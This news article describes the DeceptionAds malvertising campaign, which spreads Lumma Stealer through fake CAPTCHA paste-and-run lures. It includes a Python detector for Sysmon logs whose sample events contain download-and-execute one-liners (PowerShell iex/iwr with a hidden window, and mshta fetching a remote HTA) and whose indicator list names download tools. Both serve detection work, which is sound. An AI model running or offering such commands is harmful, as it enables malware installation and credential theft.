A large-scale malvertising campaign, dubbed DeceptionAds, has been distributing the Lumma Stealer malware by tricking users into running malicious PowerShell commands on fake CAPTCHA pages. Guardio Labs and Infoblox researchers linked the operation to the threat actor Vane Viper, who leveraged the Monetag ad network to generate over one million impressions daily across thousands of websites.
Victims are lured by pop-up ads on pirated-software and illegal streaming sites, which route them through the BeMob cloaking service so that the lure is hidden from security scanners and shown only to intended targets. The fake CAPTCHA page silently writes a malicious PowerShell command to the clipboard and tells the visitor to open the Windows Run dialog (Win+R), paste and press Enter; the victim therefore launches the malware themselves, with no exploit or download prompt involved.
Lumma Stealer is an infostealer that harvests credentials, cookies, payment-card data and cryptocurrency wallet information from browsers such as Chrome, Firefox and Edge. The stolen data is archived and exfiltrated to the operators for follow-on fraud or sale on cybercrime markets.
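Because the pasted command runs from the Run dialog, which explorer.exe hosts, it shows up in endpoint telemetry as a script interpreter spawned directly by explorer.exe. The following detector, an added example that is not code from Guardio Labs, Infoblox or the article, triages Sysmon-style process-creation records for exactly that pattern. The sample events and the example.invalid URLs are constructed, the field names assume Sysmon Event ID 1 naming, and the indicator list and threshold are the author's own heuristics rather than anything the campaign analysis publishes:

```python
import re

# Constructed sample process-creation records in Sysmon Event ID 1 style; not real telemetry.
# The Run dialog (Win+R) is hosted by explorer.exe, so a paste-and-run command appears as a
# child of explorer.exe with the pasted text as its command line.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr -UseBasicParsing https://example.invalid/verify.txt)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/captcha.hta"},
    {"ParentImage": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

# Interpreters a paste-and-run lure typically invokes (hypothetical list, extend as needed).
INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")

# Command-line indicators typical of download-and-execute one-liners (author's heuristics).
INDICATORS = [
    (re.compile(r"(?i)-w(indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"), "encoded command"),
    (re.compile(r"(?i)\biex\b|invoke-expression"), "Invoke-Expression"),
    (re.compile(r"(?i)\b(iwr|invoke-webrequest|downloadstring|curl|wget)\b"), "remote download"),
    (re.compile(r"(?i)\bmshta\b.*https?://"), "mshta remote script"),
]


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons). A score of 0 means the event does not match the pattern."""
    reasons = []
    # Only children of explorer.exe matter here: that is where Run-dialog launches come from.
    if basename(event["ParentImage"]) != "explorer.exe":
        return 0, reasons
    if basename(event["Image"]) not in INTERPRETERS:
        return 0, reasons
    reasons.append("interpreter launched from explorer.exe")
    for pattern, label in INDICATORS:
        if pattern.search(event["CommandLine"]):
            reasons.append(label)
    return len(reasons), reasons


def detect(events, threshold=2):
    """Return (command line, reasons) for every event scoring at or above the threshold."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((event["CommandLine"], reasons))
    return hits


if __name__ == "__main__":
    for cmd, reasons in detect(SAMPLE_EVENTS):
        print(f"SUSPICIOUS: {cmd}\n  because: {', '.join(reasons)}")
```

The default threshold of 2 requires an interpreter under explorer.exe plus at least one command-line indicator, because explorer.exe also parents ordinary double-clicked shortcuts and scheduled admin scripts; treat hits as triage leads, not verdicts, and pair them with the RunMRU registry key on the host, which keeps a history of what was typed into the Run dialog.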
Monetag and BeMob moved quickly to disrupt the campaign, removing hundreds of accounts within days, but the operators resurfaced on another ad network shortly afterwards. The researchers warn that infostealer campaigns of this kind are increasingly common and that the harvested credentials and session cookies feed financial fraud, data breaches and ransomware intrusions.
Users are advised to avoid executing any website-prompted commands and refrain from using pirated content sites, which often expose visitors to these malicious ads.